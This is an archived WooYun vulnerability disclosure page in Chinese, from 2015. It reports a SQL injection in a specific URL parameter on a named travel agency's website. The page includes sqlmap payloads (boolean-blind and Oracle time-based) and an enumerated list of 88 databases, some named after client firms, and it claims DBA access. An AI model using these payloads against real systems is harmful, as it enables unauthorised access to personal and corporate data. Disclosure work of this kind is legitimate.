中智集团旗下子公司中智国旅存在高危SQL注入且权限为DBA涉及88个数据库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137174

漏洞标题：中智集团旗下子公司中智国旅存在高危SQL注入且权限为DBA涉及88个数据库

漏洞作者：路人甲

提交时间：2015-08-26 19:05

修复时间：2015-10-10 19:06

公开时间：2015-10-10 19:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-26：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国国际技术智力合作公司（简称中智，英文缩写CIIC）成立于1987年，是中央管理的国有重点骨干企业，由国务院国有资产监督管理委员会监管。
中智国际旅行社有限公司简称中智国旅，前身是中智航空运输服务有限公司，成立于1998年。2008年经国家工商总局和国家旅游局批准，成为具有独立企业法人的具有出境旅游资质的国际旅行社，是中智集团下属全资子公司。

详细说明：

漏洞地址：

http://www.ciicts.com.cn/eng/qianzheng2.asp?id=44

payload:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=44 AND 1139=1139
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=44 AND 1328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(116)||CHR(84)||CHR(86),5)
---
[16:14:37] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

漏洞证明：

88个数据库

available databases [88]:
[*] "CIICBJ-CMS2013"
[*] "CIICBJ-CMS2031"
[*] CA_SALARY
[*] CAREERTJ
[*] CIIC_DEV
[*] CIIC_IMP
[*] CIIC_WELFARE
[*] CIICFS
[*] CIICTJ
[*] CIICTS
[*] CISCO
[*] CMB_CIIC_EMP
[*] CSP_ADOBE_TEST
[*] CSP_ESI_TEST
[*] CSP_JPMORGAN
[*] CSP_JPMORGAN_TEST
[*] CSP_SETTING
[*] CSP_TEST
[*] CTXSYS
[*] DBSNMP
[*] DEPUY
[*] DMSYS
[*] DRINK_PROVIDE
[*] EMP_SERVICE
[*] EXFSYS
[*] HR
[*] IBM_DEV
[*] INTELHR
[*] ISSC
[*] IX
[*] KH_VISTO_SALARY_TEST
[*] LUTONG_SALARY
[*] LYC_TEST
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] OMS_ADOBE_TEST
[*] OMS_BCYL
[*] OMS_BCYL_DEMO
[*] OMS_BCYL_TEST
[*] OMS_CSP_TEST
[*] OMS_DB
[*] OMS_DB_DEMO
[*] OMS_DB_TEST
[*] OMS_DIC
[*] OMS_ECARD
[*] OMS_EM
[*] OMS_GYFL
[*] OMS_GYFL_DEMO
[*] OMS_GYFL_TEST
[*] OMS_JPMORGAN_TEST
[*] OMS_KEFU
[*] OMS_KEFU_DEMO
[*] OMS_KEFU_TEST
[*] OMS_LENOVO
[*] OMS_OFFICE
[*] OMS_QUANGUO
[*] OMS_QUANGUO_DEMO
[*] OMS_QUANGUO_TEST
[*] OMS_RUZHI
[*] OMS_SALARY_DEMO
[*] OMS_SCB
[*] OMS_SURVEY
[*] OMS_WSCX
[*] OMS_WSCX_DEMO
[*] OMS_WSFW
[*] OMS_WSFW_TEST
[*] OMS_YJSJS_WEB
[*] OMS_ZSK_DEMO
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PUBSYS
[*] PUBSYS2007
[*] PUBSYSTJ
[*] REPADMIN
[*] REUTERS
[*] ROCKWELL_DB
[*] SAMSUNG_SALARY
[*] SCOTT
[*] SH
[*] SPIRENT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

DBA权限

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137174

漏洞标题：中智集团旗下子公司中智国旅存在高危SQL注入且权限为DBA涉及88个数据库

相关厂商：中智国旅

漏洞作者：路人甲

提交时间：2015-08-26 19:05

修复时间：2015-10-10 19:06

公开时间：2015-10-10 19:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137174

漏洞标题：中智集团旗下子公司中智国旅存在高危SQL注入且权限为DBA涉及88个数据库

相关厂商：中智国旅

漏洞作者： 路人甲

提交时间：2015-08-26 19:05

修复时间：2015-10-10 19:06

公开时间：2015-10-10 19:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0137174"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云